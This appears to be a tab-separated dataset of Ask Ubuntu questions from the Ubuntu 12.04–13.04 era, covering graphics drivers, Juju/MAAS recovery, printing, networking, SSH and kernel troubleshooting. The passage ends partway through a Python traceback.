289047	unity wo n't to start after installing proprietary amd graphics driver	after installing ubuntu 13.04 64-bit , i installed all the updates , and then i installed the proprietary amd graphics drivers for my amd radeon 7670m 1gb ddr3 graphics card ( i have samsung np350v5x ) , but after restart when i login to my account , i ca n't get to the unity desktop . first i tried to install gnome shell , but when i tried to boot to that i just got gnome fallback ( old gnome 2 style ) . next i tried this : unity does not start in ubuntu 13.04 dconf reset -f /org/compiz/ unity -- reset-icons & disown the open source graphics driver works ok , but i want better 3d performance , and i ca n't get that with the open source driver .
289049	openstack mass/juju recovery	i have created openstack based on maas using juju . i have created instances , projects etc . i have made backups of database and openstack config files . i am trying test recovery by destroying and removing service keystone , just to see if it was recoverable . i also drop the keystone database . ( it is backed up ) so with juju i destroy the old keystone which was broken , and deploy a new keystone . this actually gets me running again except for the fact that all projects ( tenants ) are gone , and the instances does not belong to any project . so i restore the keystone database but without the tokens but when i do that i get an error in horizon telling me that keystone will not authorize the client . what would be the best way to restore a broken keystone node ... ? it seems when you redo keystone with juju you get new tokens . can juju somehow inject the old ones into the the new keystone ?
289052	making localhost as worldwide server	i am using ubuntu 12.04 with kde desktop . i have installed apache2 on my pc . i want set my localhost as remote accessible server . what i must to do ? what is the nat or ubuntu servers settings ?
289062	ubuntu update problem	i`m trying to update & upgrade my current version of ubuntu but i have some problems : when i run apt-get update i get the following errors : w : failed to fetch http : //ppa.launchpad.net/antonio.chiurazzi/ppa/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/antonio.chiurazzi/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i removed the sources from var/lib/apt/lists but i still receive the same error . can anybody tell me what 's happening and how i can remove that to successfully update my ubuntu ? my configuration : ubuntu 12.10 on intel i3 processor with 4gb ddr3 ram .
289069	scanner not working	i have a canon mp-280 series printer cum scanner . i can use the printer , but when i try to use simple scan its saying no scanner connected . please help me fix this .
289082	how to set up ubuntu + win 8 in virtualbox , when win 8 is pre-installed ?	i have a samsung i3 ultrabook . it runs windows 8 . i used to run ubuntu in virtualbox . i hate it . i want to run ubuntu as host . but win 8 should be running in virtualbox ( for office + acrobat ) . but the notebook does not come with a win 8 cd or serial number or anything . i fear that once i install ubuntu as a host , i wo n't be able to get a running win 8 again . win 8 seems to be backed up on a recovery partition , but not on a physical drive . how to set this up ? no , i do n't want a dual boot , i want ubuntu only . with win 8 running in virtualbox . no , there is no win 8 dvd that comes with the ultrabook
289085	how to pack a program for easy ubuntu installations ?	//ubuntu newbie here we have a framework that we need to be able to easy deploy on ubuntu machines ( 12.04 ) . which format should i use ? ( rpm , deb , something else ? ) how does one goes on to pack a program into a deb format ? are there any tools for that ?
289089	view printer driver associated with print queue	how can i find what print driver is being used for a specified print queue using the command line ? the printer driver associated with a print queue can be seen in cups web interface but i can not find out how to display this same information using the command line . ideas ? thanks dan
289091	ca n't install wine on 12.04.2	i have just done a new install of 12.04.2 i am running an acer travelmate 7750g 64 bit with core-i7 processor . when i try and install wine from the software center , i get the following error : the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.1.2ubuntu7.1 is to be installed depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu10.4 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu1~precise1~ppa4 ) but 1.4.1-0ubuntu1~precise1~ppa4 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu1~precise1~ppa4 ) but it is a virtual package i am a relative ubuntu newbie when it comes to installing software other than via the software centre , so can anyone perhaps tell me how to go about fixing this ? tia : )
289098	change language in ubuntu 13.04	i have installed ubuntu 13.04 with daily builds and updated a long the road until now ... but one thing that never change is the language settings . i prefer swedish as default language in menus and settings but even if i uninstall all languages but swedish i just get english in all menues . what can i do to get swedish in the menues , i have tried to uninstall all languages and reinstall but still just english.. ?
289100	how to fix my kernel version ?	i have recently updated my kernel version . i restarted my computer and this is what i get ! i have installed the version 'ubuntu , with linux 3.4.0-030400 version . when i click enter with the first choice . my machine boots to the version but after clicking the new version , my screen stays purple . i restated my machine , went to the grub screen then to the 'previous linux versions ' , then went back to my previous kernel version 3.2.0-39-generic ' and runs correctly and works perfect . proof how can i delete this new kernel and get the previous one back ? can i restore to an older time , with the good kernel ? can i delete all the kernels and put this new one in ?
289103	initctl status autofs is stuck on stop/starting	we have an issue with upstart not restarting the autofs job when the automount process dies , and the upstart job status gets stuck in the `` stop/starting '' state . the process is not automatically restarted by upstart like it is supposed to . trying to manually control the job fails too : root @ www1 : ~ # initctl status autofs autofs stop/starting root @ www1 : ~ # initctl stop autofs initctl : job has already been stopped : autofs root @ www1 : ~ # initctl start autofs ^c < -- hangs root @ www1 : ~ # initctl restart autofs ^c < -- hangs starting the automount process manually works just fine , but upstart still does not recognize that the job is running . i 've tried initctl reload-configuration but that did n't change anything . rebooting has fixed the problem in the past , but is not a permanent solution since this is a production web server and we 've seen this problem pop up a few times - often months apart from each other . we need to track down the problem and find a fix for it . i 'm posting here before filing a bug to make sure i 'm not missing the obvious . this is ubuntu 12.04 server with upstart 1.5-0ubuntu7.2 and autofs5 5.0.6-0ubuntu5.1 . /etc/init/autofs.conf has not been modified .
289107	where can i find the configuration file for keyboard shortcuts in 12.10 ?	where can i find configuration file for keyboard shortcuts ?
289109	thunderbird new email count not displayed in 13.04	since upgrading to ubuntu 13.04 , thunderbird ( 17.0.5 ) no longer displays the number of new emails in the launcher . the notification menu still displays as the emails come in , but there is no persistent number which appeared in a white circle on the launcher in 12.10 . does anyone know how to get this back ?
289111	what 's the relation between different touch install instructions for the nexus 7 ?	there are two different instructions ( at least as long as you use nexus 7 ) . one at https : //wiki.ubuntu.com/nexus7/installation , one at https : //wiki.ubuntu.com/touch/install . the former seems to point at slightly older files .
289116	reinstall linux system without overwriting	i have a server that i use to host my mythtv backend among other things . it seems that root partition with the system on it became corrupted . i booted it with a livecd and repaired the partition with fsck and it is now clean . however , it seems that critical files / directories are now missing and the server will not boot . i have backed up my critical files to a thumb drive and now want to repair the system . i am hoping that there is a method where i can use the installer to install linux again but not overwrite all that goodness i created ? the home directories and data stores for the myth videos are on separate partitions and were not corrupted . if i go into the custom settings of the install and ask it not to format the drive , will this work for me ? thank you .
289118	foo2capt -canon lbp2900 printer configuration	how can configure canon lbp2900 printer using foo2capt driver downloaded from http : //sourceforge.net/projects/foo2capt/ in ubuntu 13.04
289119	how to install adobe flash professional cs5.5 ?	i downloaded adobe flash professional cs5.5 on ubuntu 12.10 with wine 1.4.it creates the installer clearly.but when i typed the serial key and continued installation , it is showing me an error message.tell me what to do !
289120	do n't bother non-admin users with admin questions	my wife and kids use ubuntu laptops which i administer . how do i prevent the system from , e.g. , offering them software updates ? ( i know i can disable that for the whole box , but that is just one example of the wrong behavior - assuming that any user is an admin ) . specifically , i want to mark some users as non-admin users , so that they are never prompted for anything which requires root password . i reported this as a bug but received no comments there . i wonder if i am barking up the wrong tree ( i.e. , the vast majority of ubuntu users administer their boxes ) . but what about all those ubuntu boxes in schools ? otoh , the people affected by this issue , i.e. , non-admin users , are unlikely to have a launchpad account , so they can not vote for the bug .
289123	building a ubuntu kiosk	i would like to customize ubuntu 13.04 to use for a public use kiosk . from what i have been reading , the tool pessulus that was used to lock down the interface in the older versions of ubuntu has been deprecated . basically , i want the users to have access to the desktop to open firefox or play the default installed games . i dont want them to be able to right click , see or open anything else . any ideas ? i have tried different distros such as mint and xubuntu but i havent had much luck .
289125	( 13.04 ) powertop reports lots of usage by usb2.0-crw , but autosuspend is on	i used to be able to keep my power usage under 10 watts without wlan on but now that rarely happens . one reason might be this , reported by powertop all of the time : power est . usage events/s category description 8.69 w 100.0 % device usb device : usb2.0-crw ( generic ) this is especially odd , because this setting is enabled in tunables ( via tlp ) : good autosuspend for usb device usb2.0-crw [ generic ] is there any way i can a ) tell exactly which device/driver this is and b ) permanently disable it on startup just to make sure it is n't taking any power ? if it helps , here 's my lsusb output : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 5986:0292 acer , inc bus 002 device 003 : id 0489 : e00d foxconn / hon hai broadcom bluetooth 2.1 device bus 002 device 004 : id 0bda:0139 realtek semiconductor corp. card reader here is the usb section from the output of tlp-stat : +++ usb tlp usb autosuspend = enabled tlp usb blacklist = ( not configured ) bus 001 device 002 id 8087:0024 control = auto , autosuspend_delay_ms = 2000 -- intel corp . integrated rate matching hub ( hub ) bus 002 device 002 id 8087:0024 control = auto , autosuspend_delay_ms = 2000 -- intel corp . integrated rate matching hub ( hub ) bus 001 device 001 id 1d6b:0002 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 2.0 root hub ( hub ) bus 002 device 001 id 1d6b:0002 control = auto , autosuspend_delay_ms = 2000 -- linux foundation 2.0 root hub ( hub ) bus 001 device 003 id 5986:0292 control = auto , autosuspend_delay_ms = 2000 -- acer , inc ( uvcvideo ) bus 002 device 003 id 0489 : e00d control = auto , autosuspend_delay_ms = 2000 -- foxconn / hon hai broadcom bluetooth 2.1 device ( btusb ) bus 002 device 004 id 0bda:0139 control = auto , autosuspend_delay_ms = 2000 -- realtek semiconductor corp. card reader ( rts5139 )
289126	non-pae plus unstable intel display driver	i have three non-pae ( pentium m ) laptops . they are all in a good physical state and work perfectly well , so i have no reason to stop using them ... that is , except for getting left behind as the later updates of ubuntu require pae . i was advised to stick to the non-pae variant of 12.04 , but that release has an intel display driver problem that causes my systems to boot to a blank screen . reverting back to 10.04.4 lts has a similar intel display instability . when i have asked this question elsewhere i have been advised to throw away my hardware and buy new . i 'm reluctant to junk perfectly good machines , and i do n't have the finances to replace them . so.. advice please on where to go with this situation .
289132	will lenses or scopes that worked in 12.04 work in 13.04 ?	am i able to install a lens or a scope in 13.04 that i had used before in 12.04 ? are the lenses and scopes build earlier ( what lenses are available for unity ? ) able `` to just work '' on 13.04 ? looking forward to recoll lens & news lens again if this is the case that what has worked will work just the same on 13.04 . thank you for your time and answers .
289133	13.04 gnome does n't turn off	when i want to turn off my computer with ubuntu 13.04 gnome and i writing in terminal command sudo shutdown -h now appearing black screen and the computer is still working . i using with driver : nvidia for xorg , vdpau with nvidia-310 . i using with computer : acer aspire-z5710 . i will be thankfull for answer : ) .
289134	two nics with ubuntu server 12.04	i have two nics within my ubuntu server . one being the internet , the other being an internal network . i have the following configuration whereas eth0 is the internet , eth1 is the internal network auto lo eth0 eth1 iface lo inet loopback iface eth0 inet dhcp iface eth1 inet static address 192.168.1.21 netmask 255.255.255.0 eth0 works correctly and i can not connect via the internal ip . both eth 's are up . thanks . *edit : * added the following line to /etc/network/interfaces up route add -net 192.168.1.0/24 dev eth1 seems to have fixed it but , the connection is very intermittent . *edit 2 : * after about 10 mins of everything working , i can no longer connect to the external ip address . i read somewhere that having two gateways can mess the networking up . am i affected by this ?
289136	register ios image in gns3	i 've installed gns3 and when i want to make any topologies with elements from left side panel i get this error : please register at least one ios image how can i fixed it ? i suppose that i have to get a file image but google does n't help me .
289139	remove an installed plugin from krunner	i have kubuntu 13.04 installed . i have recently installed a package of krunner pluging ( plasma-runner-addons ) . it has some plugins for krunner but now i want to remove some of them ( not all of them so i cant simply remove the package ) . and also i 'm not going to disable them but i want to remove them . how can i remove a special plugin from krunner ? ? ? ( sorry for my bad english ) regards , mostafa
289142	`` failed to setuid to root . '' how do i establish a vpn network ?	my university decided that the old vpn-network , which worked fine , was n't good enough anymore and abandoned it . now i have to establish a completely new vpn-network . my university provided me with a manual ( in dutch ) which i followed , but it does n't work . almost everything could be the problem but where i 'm really stuck is at the part where terminal says : open ( /home/simon/.juniper_networks/network_connect/ncsvc.log ) failed : permission denied ncsvc > failed to setuid to root . error 1 : operation not permitted this happens everytime i enter the command that my university told me to execute : '/usr/local/nc/ncsvc ' ./ncsvc -h uvavpn.uva.nl -u < username > -r users -f uvavpn.uva.nl.der i searched some fora looking for anwsers but since i 'm a new ubuntu user i did n't understand what was going on at all . is there someone out there who knows how to solve this error ? and can explain it to me in the easiest possible way ? i use ubuntu 12.04 , 32-bit . i do hope that this is the right place to ask this question , thanks in advance , simon
289148	computer desktop icon for 13.04	i know that ubuntu 13.04 does n't have a `` computer '' icon for desktop anymore , is n't there a way to make a shortcut for it tough ? googled a few days back and i know i saw a tutorial somewhere but i can not find it anymore ? can someone help me ?
289149	two nics ubuntu server 12.04	i have two nics within my ubuntu server . one being the internet , the other being an internal network . i have the following configuration whereas eth0 is the internet , eth1 is the internal network auto lo eth0 eth1 iface lo inet loopback iface eth0 inet dhcp iface eth1 inet static address 192.168.1.21 netmask 255.255.255.0 eth0 works correctly and i can not connect via the internal ip . both eth 's are up . thanks .
289150	is there a way i can transfer all my web sites on localhost to a new computer ?	i have a whole set of web sites on my ubuntu computer that i use for testing and development . i do n't host them on the internet , i just access them locally for design and debugging . each one is built on php , each one uses a mysql database . there are about twelve of them . i want to transfer them to a new ubuntu install . i 've done this before , and when i have , i created each config file in /etc/apache2/sites-enabled , i load in each mysql database , i create a user for each database ... it 's tedious and prone to ( my ) human error . i already have all sites and all configurations set up on one computer . is there not a way i can wholesale pick up all the databases , files , apache settings , configurations , and everything and move it to the new server all in one go ?
289153	chrome automatically starts on boot while using xfce	as i said in title , when i boot my pc and after system loads , chrome starts automatically . i checked in startup application , and i could n't find chrome entry . can anyone tell me why chrome starts automatically and how to stop it . i 'm using xubuntu 13.04
289155	`` disk i/o error : '' can not write anything to mounted partitions	recently i have lot of disk i/o errors . i am not able to save anything even on my home partition . i have the same problems in 12.04 , 12.10 and now in 13.04 . following is the output of mtab /dev/sda8 / ext4 rw , errors=remount-ro 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/cgroup tmpfs rw 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 none /run/user tmpfs rw , noexec , nosuid , nodev , size=104857600 , mode=0755 0 0 /dev/sda2 /mnt/c fuseblk rw , nosuid , nodev , allow_other , blksize=4096 0 0 /dev/sda3 /mnt/d fuseblk rw , nosuid , nodev , allow_other , blksize=4096 0 0 /dev/sda7 /home ext4 rw 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfsd-fuse /run/user/v/gvfs fuse.gvfsd-fuse rw , nosuid , nodev , user=v 0 0 v @ t400 : ~ $ when i reboot , i get a disk check error message at `` splash screen '' . i select `` f '' to fix the error , and then i am able to resolve the issues . skype is the first application to report the error for disk i/o error . if i try to take a snapshot of the error shutter does not allow me to save the picture even in my home partition . also strangely enough /dev/sda5 300933120 304836607 1951744 82 linux swap / solaris /dev/sda6 304838656 309637119 2399232 82 linux swap / solaris i have two swap partitions . can this happen on its own ? i am sure i never made more than one . can any suggest , what must be going wrong here ?
289158	confused keys in ubuntu 13.04	i recently installed ubuntu 13.04 , and i add my ssh key to my github account , like always i did . i did n't had any problem to access to my own reports , i could clone my reports , etc ... but today , maybe for any updates ? ( i do n't know ) , i ca n't connect to github , it says : permission denied . for sure , i have my key added . for my surprise , if i change to another terminal ( alt + ctrl + f3 for example ) and i login with the same user than the default terminal with unity ( maybe there is the problem ) i can connect ! ! with the default terminal ( unity ) if i run this command : ssh -t git @ github.com it says : agent admitted failure to sign using the key . permission denied ( publickey ) . but if i run the same command on another terminal , it ask for my passphrase ( why in the default it does n't ask me for my passphrase ? ) and it 's run ok with the msg : hi -- myname -- ! , you 've succesfuly authenticated ... .. anyone knows what are happening ? post of ssh -vt git @ github.com of default terminal : > openssh_6.1p1 debian-4 , openssl 1.0.1c 10 may 2012 debug1 : reading > configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config > line 19 : applying options for * debug1 : connecting to github.com > [ 204.232.175.90 ] port 22. debug1 : connection established . debug1 : > identity file /home/daniel/.ssh/id_rsa type 1 debug1 : checking > blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking > blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file > /home/daniel/.ssh/id_rsa-cert type -1 debug1 : identity file > /home/daniel/.ssh/id_dsa type -1 debug1 : identity file > /home/daniel/.ssh/id_dsa-cert type -1 debug1 : identity file > /home/daniel/.ssh/id_ecdsa type -1 debug1 : identity file > /home/daniel/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol > version 2.0 , remote software version openssh_5.5p1 > debian-6+squeeze1+github12 debug1 : match : openssh_5.5p1 > debian-6+squeeze1+github12 pat openssh_5* debug1 : enabling > compatibility mode for protocol 2.0 debug1 : local version string > ssh-2.0-openssh_6.1p1 debian-4 debug1 : ssh2_msg_kexinit sent debug1 : > ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr > hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none > debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : > expecting ssh2_msg_kex_dh_gex_group debug1 : ssh2_msg_kex_dh_gex_init > sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : server host > key : rsa 16:27 : ac : a5:76:28:2d:36:63:1b:56:4d : eb : df : a6:48 debug1 : host > 'github.com ' is known and matches the rsa host key . debug1 : found key > in /home/daniel/.ssh/known_hosts:4 debug1 : ssh_rsa_verify : signature > correct debug1 : ssh2_msg_newkeys sent debug1 : expecting > ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not > allowed by server debug1 : ssh2_msg_service_request sent debug1 : > ssh2_msg_service_accept received debug1 : authentications that can > continue : publickey debug1 : next authentication method : publickey > debug1 : offering rsa public key : /home/daniel/.ssh/id_rsa debug1 : > server accepts key : pkalg ssh-rsa blen 279 agent admitted failure to > sign using the key . debug1 : trying private key : > /home/daniel/.ssh/id_dsa debug1 : trying private key : > /home/daniel/.ssh/id_ecdsa debug1 : no more authentication methods to > try . permission denied ( publickey ) .
289160	how to read file starting from a specific number of line within the `` while read `` ?	all what i want is to specify a certain number of line like this linenumberis=3 and to tell while read to start out of this third line or what ever line number and fetching lines after wards to execute some commands later on the fetched lines something like that while read line from $ linenumberis do **some commands not just echo nor printing on the screen** done < $ datafile
289161	ubuntu 13.04 unity mail	i added account to unity mail and added it to the launcher . it still does n't make any sound or notification if email arrives ( i changed the settings and i know it 's correctly connected to gmail , because when i press on the icon , it goes to the gmail page ) . why ?
289163	ghost title bar in qt programs	i 'm using ubuntu 13.04 and i guess ever since i updated it from 12.10 i 've been having a problem with qt applications ( vlc and k3b , specifically ) . sometimes , when i open them , the title bar does n't work . it is unclickable , so when i try to double click it ( to maximise it ) , or drag it , or click on one of the control buttons , the window simply minimizes . the solution i found was to ctrl+super+up , so the window is maximized and the title bar disapears . if i restore the window again the title bar works normally again . here are some prints :
289165	error when installing rtl8188cus wireless driver from sh : `` /lib/modules/3.5.0-27-generic/build : no such file or directory ''	i 'm using 12.10 , updated to this day . the realtek usb wi-fi dongle does n't work . i 've seen lots of discussions in forums that suggests downloading the official driver . however , when i run `` sudo bash install.sh '' , it gives me this error : ... cd os_dep ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko authentication requested [ root ] for make driver : make arch=x86_64 cross_compile= -c /lib/modules/3.5.0-27-generic/build m=/home/kelvin/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 modules make : *** /lib/modules/3.5.0-27-generic/build : no such file or directory . stop . make : *** [ modules ] error 2 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # compile make driver error : 2 please check error mesg # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # i 'm unable to decipher what the error means . help , please . thanks .
289166	apport package hook for 3rd-party package not being called	i have a proprietary package , installed via a .deb file . the package provides an upstart script which uses the respawn stanza - i.e . the executable gets restarted when it is killed , even with a sigsegv . i 'm trying to use apport to : provide the core dump ( or any other pertinent crash-related info ) stop the service i created a package-hook and placed it in /usr/share/apport/package-hooks , but i do not see it being called . i tried naming the hook as suggested in the apport developer howto ( both .py and source_.py ) and placing it in /usr/share/apport/general-hooks , to no avail . the contents of the package hook file are as follows : import os import apport.hookutils def add_info ( report , ui ) : with open ( '/tmp/foo ' , 'w ' ) as f : f.write ( `` hi\n '' ) f.flush ( ) ... just so i can see whether the hook gets called or not . for the record , the hook does not get called when i issue a kill -s sigsegv on the package executable . the hook ( /usr/share/apport/general-hooks/source_.py ) does get called when i run 'apport-bug packagename ' . i 'd appreciate any help and pointers ( to documentation or otherwise ) . i 'm using ubuntu 12.04.1 lts and apport 2.0.1-0ubuntu17.2 . thanks .
289169	no icons , launcher , top panel or anything else while 'try ubuntu '	i just got ubuntu live media on usb and pressed 'try ubuntu ' and that worked very well , so i decided to install . at the end of the install i got a fail message and it said something about the boot loader , and that made me unable to boot to ubuntu . i wanted to use the boot-repair tool , but the problem is now that , when i go to 'try ubuntu ' i just get the background but no icons , top bar or anything like that ? only the background and my mouse . i ca n't open anything , but just chill with my mouse . i tried ( old windows user ) to press ctrl+alt+delete and that logged me out . it said i could log in again , but i do n't really know what username to use or which password that is useful . i 've been trying to reboot several times , but i just get the same result . is it possible for me to use the boot-repair tool in another way than with the 'try ubuntu ' or can i fix the icon , launcher , top bar in a way ( without using the termal . since i ca n't open it ) .
289171	brightness controls not working on a dell inspiron n4010 laptop	i have a dell inspiron n4010 laptop . my brightness hotkeys are not able increase or decrease the brightness of the screen . and as a matter of fact , i also can not reduce the brightness from the brightness & lock menu under system settings . any solutions ? edit : i think i may have found the reason behind the problem . in the previous versions of ubuntu there were acpi_video0 and intel_backlight inside the /sys/class/backlight folder . now in 13.04 there are dell_backlight and intel_backlight in that folder . and the most interesting part , my friend installed 13.04 on his dell vostro and in his system 's /sys/class/backlight folder there are acpi_video0 and intel_backlight . so the brightness hotkeys are working for him .
289180	creating new network	this has probably been hashed out somewhere here , but i haven’t found it : i’m a high school teacher , and assistant tech coordinator . i’m thinking of converting my lab to ubuntu and currently have some standalone test machines going . i’ve been using some flavor of ms server for the last 15 years so i’m a bit familiar with that environment , but here are the questions : if i built a blended network with a windows server and ubuntu clients , what is the general consensus on systems like centrify or likewise ( beyondtrust ? ) . any other recommendations ? if i made a pure ubuntu network , is there a guide that could be recommended for setting up an entire ubuntu network from scratch ? main features i need to operate with are : roaming profiles ( so students can use any machine and still have their files ) , and a way to manage user access and o/s permissions ( i.e . limiting their ability to customize their system ) . in a pure ubuntu network , what add-ons would be recommended ? ( a way to create accounts from a csv would be nice . ) i can’t really depend upon any cloud based solutions as bandwidth on the campus is shaky . within my lab i’m running gigabit whereas the rest of the campus has 100 mb the often seems to lose its connection . i don’t want to use thin clients as this lab’s main focus is imaging so we have rather large image files along with some minor video editing , and next year i’m planning on adding 3d graphics .
289183	copying second sceeen to be displayed on first screen	i 'm developing an application that utilizes 2 screens , using ubuntu 12.04 . the monitor is back to back , one side to the operator , the other facing toward customer . the problem is , on both monitor i need to play the exact same video using mplayer , but on the first screen , by the admin , i also need to display a small window ( my app ) to control the video , like play pause etc . the control is for video on both screen . so for this , i dont think i can use clone monitor setting because the second screen is only use to display the video playing . my question is , does mplayer has the ability to duplicate video playing on both screen ? if no 1 is not applicable , does any application exists on ubuntu to capture and display whatever is displayed on second screen to be then played back on the first , at realtime as of it is duplicated . if both above sounds crazy and impossible , any suggestions please ? edit : let me give a better picture . let say i 'm opening openoffice word and calculator . i need word to be shown on both screen , but the calculator on shown on first screen . thank you .
289185	8 cpu and one is at ~100 % all the time	with : ubuntu release 12.04 ( precise ) 64-bit kernel linux 3.2.0-29-generic intel® core™ i7-3635qm cpu @ 2.40ghz × 8 the first cpu is always at ~70 % -100 % with nothing big running and it is making the fan noisy . i am wondering if it is normal and if not , how can i fix this ? thanks .
289187	how to reinstall ubuntu from terminal ?	is there any way to reinstall ubuntu 12.04 straight from the terminal ? my terminal works but i literally almost purged my entire operating system by accident ( bad advice from a community member ) . the terminal runs on a black screen now but it works . any ideas ?
289190	how to change system language ?	i use ubuntu-gnome 13.04 and i ca n't change system language . i set it to polish with `` language & regions '' . it was though because there is no option for adding so i installed : language-pack-pl language-pack-gnome-pl then i could pick it in `` language & regions '' and then reboot . however this did n't solve my problem i also change it with gnome-language-selector and still got english . please help , because if the language is other than polish i will have to switch back to windows . i like the gnome3 .
289196	how should i partition my 128gb crucial ssd in my netbook for ubuntu 13.04 ?	i know this is probably a question this is asked over and over again but i 'm not finding anything close to an answer that i need . i am installing ubuntu 13.04 on my lenovo x130e netbook . it has been a long time since i have used ubuntu ( hardy heron ) so i 'm not exactly sure on how to go about this . here 's my system specs : cpu : amd e450 apu dual 1.65ghz ram : 8gb ddr3 corsair vengence 1066mhz ssd : crucial m4 128gb ssd vid : radeon hd6320 384mb now here 's my questions : since i am running a single ssd and have plenty of ram , should i use a swap file ? if so how large of a swap ? i am going to use .ext4 filesystem but is there any specific way i should partition my drive ? ( 1 partition for /home , another for boot , etc ... ) i am planning to upgrade to 13.10 when it releases , is there anything i should keep in mind until then ? i have never really used a forum before so i figured that this would be the best time to start . i have decided that i am tired of having to deal with microsoft and want to break free of their bloated software . i have read through your forums many times before and found that this is probably the best place to begin the process of reacquainting myself with ubuntu . thanks for your time !
289197	how to upgrade shutdown dialog just like ubuntu 13.04 in ubuntu 12.04 ?	is there any way to change the shutdown / restart dialog to the more pleasant version running in ubuntu 13.04 's ? i am running ubuntu 12.04 lts and do not want to upgrade to 13.04 . this is for aesthetics only , my current dialog is working fine .
289205	disable downloaded files in dash	how can i disable the downloaded files section from the unity dash ? i have already excluded the downloads folder in my privacy settings but that does n't help .
289212	need help setting up wifi printing to canon imageclass mf5950dw	i just purchased a new laptop from system76 and am trying to print via wifi to my canon imageclass mf5950dw . canon makes drivers for it available for 64-bit versions of ubuntu 13.04 and they install perfectly . the problem is they do not by default work over wifi like the printer does for windows pcs and macs . i called canon and they told me we make the drivers available but refuse to support the drivers in any way . this is what they told me when i called them . can anyone give me any assistance to get ubuntu to print wirelessly ? i do n't want to send back this new laptop just because it ca n't print . i need to print from this laptop all day long ( this is the reason i got it ) .
289214	installing the linux-virtual package from a preseed file	i 'm attempting to automate a server installation of precise on a virtualbox vm . eventually i 'll use some of the preseed configuration to install it on a few esxi vms . i would like to use the linux-virtual kernel package and the documentation suggests that it is possible to change the kernel selection . i currently have these lines in my preseed file d-i base-installer/kernel/image string linux-virtual d-i base-installer/kernel/altmeta string linux-virtual i 've also tried various other strings including linux-image-virtual . although linux-virtual is not on the server install cd , it is in the archive and i have the preseed file set up our local apt-cacher-ng instance : d-i apt-setup/local0/repository string http : //core:3142/gb.archive.ubuntu.com/ubuntu precise-updates main d-i apt-setup/local1/repository string http : //core:3142/gb.archive.ubuntu.com/ubuntu precise main d-i apt-setup/local2/repository string http : //core:3142/gb.archive.ubuntu.com/ubuntu precise-security main however during the installation i just get a selection menu which allows me to choose from various flavours of the generic kernel . i 'd like to install linux-virtual within the preseed so i can avoid the need to reboot again , as i would have to if i installed it after the installer had run .
289219	i have a special line in my grub of ubuntu 11.10 -- will it survive to 12 if i `` do-version-upgrade ? ''	a problem with computers with intel sandy bridge and intel celeron causes them to display only a black screen and a mouse cursor if rc6 is enabled ( which it has been for all versions after 11.10 ) . in order to get ubuntu working on this computer ( an intel `` next unit of computing '' or `` nuc '' model 847 ) i had to install ubuntu 11.10 , which is running fine now . after i did that , i modified grub to change it from : grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash i915.i915_enable_rc6=0 '' . i need that i915.i915_enable_rc6=0 bit to survive the version upgrade or i ca n't upgrade . will it survive ?
289222	ca n't save default microphone volume	i 've tried sudo alsamixer changed values and then sudo alsactl store every time i boot up , the default microphone volume always gets back to something like 25 % .
289226	juju and maas : error no matching node is available	i had created an environment w/ juju + maas , then destroyed it due to some misconfiguration . but then i re-commissioned a node ( maas is showing the node as deployed ) and now when i run juju -v bootstrap i get the following : sysadmin @ myst-a-2 : ~ $ juju -v bootstrap 2013-05-01 11:52:02,275 debug initializing juju bootstrap runtime 2013-05-01 11:52:02,308 info bootstrapping environment 'maas ' ( origin : distro type : maas ) ... 2013-05-01 11:52:02,334 debug verifying writable storage 2013-05-01 11:52:02,368 debug launching juju bootstrap instance . traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 422 , in errback self._startruncallbacks ( fail ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 489 , in _startruncallbacks self._runcallbacks ( ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 576 , in _runcallbacks current.result = callback ( current.result , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1127 , in gotresult _inlinecallbacks ( r , g , deferred ) -- - < exception caught here > -- - file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1069 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 389 , in throwexceptionintogenerator return g.throw ( 